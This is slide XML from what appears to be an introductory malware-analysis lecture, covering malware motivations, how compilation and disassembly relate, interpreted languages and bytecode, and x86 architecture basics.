        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187624" y="2420888"/>
            <a:ext cx="2425992" cy="1296144"/>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5" name="Google Shape;675;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1186926" y="2679303"/>
            <a:ext cx="242669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lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>int c;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>printf(“Hello World\n”);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>return 0;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="676" name="Google Shape;676;p69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3543265" y="4829111"/>
            <a:ext cx="2425992" cy="1296144"/>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7" name="Google Shape;677;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4072045" y="5055567"/>
            <a:ext cx="99950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lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>55</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>8B EC</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>8B EC 40</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="678" name="Google Shape;678;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1389221" y="1737682"/>
            <a:ext cx="202279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Malware writer</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High-level language</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="679" name="Google Shape;679;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5996167" y="1737681"/>
            <a:ext cx="197861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Malware analyst</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Low-level language</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="680" name="Google Shape;680;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3771586" y="4182780"/>
            <a:ext cx="151002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CPU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Machine code</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="681" name="Google Shape;681;p69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-2287589">
            <a:off x="2433970" y="3896309"/>
            <a:ext cx="325996" cy="1584176"/>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2" name="Google Shape;682;p69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-8629348">
            <a:off x="6687157" y="3832399"/>
            <a:ext cx="265049" cy="1584176"/>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3" name="Google Shape;683;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1327637" y="4628544"/>
            <a:ext cx="10374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Complier</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="684" name="Google Shape;684;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6875484" y="4686235"/>
            <a:ext cx="224273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Disassembler</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(Reverse-Engineering)</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7"/>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Existence &amp; Motivation </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="Google Shape;139;p7"/>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Existence: perceived as the tool or the weapon of an individual, organization intending an unethical or illegal act concerning computers and data.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Motivations:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>to wreck havoc: playing a prank, crash PCs, domain unavailable, etc.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>to gain profit: spam sending as a service, stealing financial or personal data, etc.</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70"/>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Disassembly</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="690" name="Google Shape;690;p70"/>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b="1" lang="en-GB"/>
              <a:t>Level of Abstraction</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Hardware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Physical; electronical circuits; logic gates (AND, OR, ..)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Firmware (microcode)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Only operates on the designed circuit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Set of micro-instructions translated from high machine code level to interact with hardware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Machine code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Hexadecimal digits (Opcodes) generated when high-level language compiled.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Underlying hardware can execute (+ microcode)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Low-level languages</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Human-readable version of a computer architecture's instruction set (e.g. assembly language: mov, jmp, etc.)</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71"/>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Disassembly</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="696" name="Google Shape;696;p71"/>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285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>High-level languages</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>C, C++</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Interpreted languages</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>C#, Perl,. NET, Java, Python</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>It is NOT complied into machine-code, translated into Bytecode instead.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Bytecode executes within an interpreter which translates bytecode into executables machine code on the fly at runtime.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Reduce the dependence on hardware and OS. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Can run on VM, e.g. JVM</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>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2"/>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Disassembly</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="702" name="Google Shape;702;p72"/>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152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Káº¿t quáº£ hÃ¬nh áº£nh cho bytecode interpreter" id="703" name="Google Shape;703;p72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331640" y="1149468"/>
            <a:ext cx="6903566" cy="2567564"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Káº¿t quáº£ hÃ¬nh áº£nh cho bytecode interpreter" id="704" name="Google Shape;704;p72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348631" y="3964260"/>
            <a:ext cx="6886575" cy="27051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73"/>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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="711" name="Google Shape;711;p73"/>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X86 Architecture </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Von Neumann architecture</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="712" name="Google Shape;712;p73"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="972006" y="2294560"/>
            <a:ext cx="5101912" cy="3888432"/>
            <a:chOff x="1619672" y="2420888"/>
            <a:chExt cx="5101912" cy="3888432"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="713" name="Google Shape;713;p73"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1619672" y="2492896"/>
              <a:ext cx="3600400" cy="2880320"/>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4" name="Google Shape;714;p73"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2195736" y="2780928"/>
              <a:ext cx="2664296" cy="90010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5" name="Google Shape;715;p73"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="2339752" y="4149080"/>
              <a:ext cx="1188132" cy="792088"/>
            </a:xfrm>
            <a:prstGeom prst="trapezoid">
              <a:avLst>
                <a:gd fmla="val 25000" name="adj"/>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6" name="Google Shape;716;p73"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3851920" y="4149080"/>
              <a:ext cx="1152128" cy="792088"/>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7" name="Google Shape;717;p73"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5796136" y="2492896"/>
              <a:ext cx="792088" cy="288032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8" name="Google Shape;718;p73"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1619672" y="5661248"/>
              <a:ext cx="3600400" cy="648072"/>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9" name="Google Shape;719;p73"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2946935" y="3046312"/>
              <a:ext cx="10259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lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>Registers</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="720" name="Google Shape;720;p73"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2705770" y="4209607"/>
              <a:ext cx="5580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lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>ALU</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="721" name="Google Shape;721;p73"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3972922" y="4221958"/>
              <a:ext cx="97288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lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>Control Unit</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="722" name="Google Shape;722;p73"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2979344" y="5800618"/>
              <a:ext cx="12543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lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>I/O Devices</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="723" name="Google Shape;723;p73"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5732659" y="3415644"/>
              <a:ext cx="98892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lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>Main</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
            <a:p>
              <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-GB" sz="1800">
                  <a:solidFill>
                    <a:schemeClr val="lt1"/>
